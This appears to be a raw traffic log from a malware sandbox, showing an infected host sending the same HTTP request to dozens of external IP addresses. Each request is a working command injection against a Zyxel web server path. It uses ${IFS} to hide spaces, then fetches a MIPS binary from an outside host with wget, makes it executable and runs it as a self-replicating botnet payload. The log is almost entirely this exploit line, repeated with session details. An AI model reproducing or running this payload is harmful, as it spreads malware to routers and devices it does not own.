                                      Jan 19, 2024 17:29:38.901297092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5943192.168.2.1438024165.241.243.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901349068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5944192.168.2.144642496.221.109.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901379108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5945192.168.2.1446114102.131.83.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901432037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5946192.168.2.1449832111.213.153.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901465893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5947192.168.2.144599269.149.114.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901493073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5948192.168.2.1441022102.127.123.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901575089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5949192.168.2.145807663.145.97.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901587963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5950192.168.2.144755673.180.243.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901642084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5951192.168.2.1451744106.247.31.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901678085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5952192.168.2.145566499.19.106.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901741028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5953192.168.2.145934467.120.12.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901776075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5954192.168.2.1434644148.153.21.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901818037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5955192.168.2.1437756112.90.106.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901851892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5956192.168.2.143790845.153.203.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901901007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5957192.168.2.14603481.114.245.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901911974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5958192.168.2.1449914218.156.124.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901957989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5959192.168.2.1442656126.242.42.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.901999950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5960192.168.2.1446706126.212.150.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902038097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5961192.168.2.1453890210.206.166.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902041912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5962192.168.2.1437154104.101.228.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902074099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5963192.168.2.1434870122.177.93.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902091980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5964192.168.2.145462647.80.43.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902170897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5965192.168.2.145530425.34.4.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902215958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5966192.168.2.146003683.211.178.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902261972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5967192.168.2.1460448112.20.154.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902280092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5968192.168.2.1444754213.248.139.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902343988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5969192.168.2.1447038203.59.103.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902355909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5970192.168.2.145774836.74.112.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902405024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5971192.168.2.1454118119.47.24.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902442932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5972192.168.2.1446544105.153.250.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902499914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5973192.168.2.145749267.253.244.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902537107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5974192.168.2.1454124126.138.4.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902592897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5975192.168.2.144486696.165.61.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902640104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5976192.168.2.1460010213.255.242.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902683973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5977192.168.2.1456418196.50.232.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902731895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5978192.168.2.144717049.174.77.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902765036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5979192.168.2.143406877.244.100.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902832031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5980192.168.2.144256085.106.194.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902862072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5981192.168.2.1440210102.42.220.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902889013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5982192.168.2.1458782125.247.188.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902920961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5983192.168.2.1435250205.99.108.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.902980089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5984192.168.2.1433504111.21.28.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903017044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5985192.168.2.1439738145.107.67.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903049946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5986192.168.2.144589649.215.1.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903079987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5987192.168.2.14534622.153.186.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903110981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5988192.168.2.145359659.219.220.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903132915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5989192.168.2.144565252.219.140.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903192997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5990192.168.2.1460900155.121.110.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903228998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5991192.168.2.1442898156.157.147.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903283119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5992192.168.2.1452260116.28.71.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903320074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5993192.168.2.1451916105.247.142.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903362989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5994192.168.2.1435082119.101.206.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903397083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5995192.168.2.143647217.144.170.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903429985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5996192.168.2.14523125.187.232.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903461933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5997192.168.2.1434720163.97.48.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903523922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5998192.168.2.1450548149.159.237.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903553009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5999192.168.2.1453046191.166.230.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903598070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6000192.168.2.1448062148.14.114.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903649092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6001192.168.2.1438690207.130.189.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903697014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6002192.168.2.145236035.81.254.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903738022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6003192.168.2.1458118216.13.74.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903780937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6004192.168.2.1448134141.201.38.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903819084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6005192.168.2.146021418.65.187.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903850079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6006192.168.2.1446444143.31.124.245443
                                      TimestampBytes transferredDirectionData
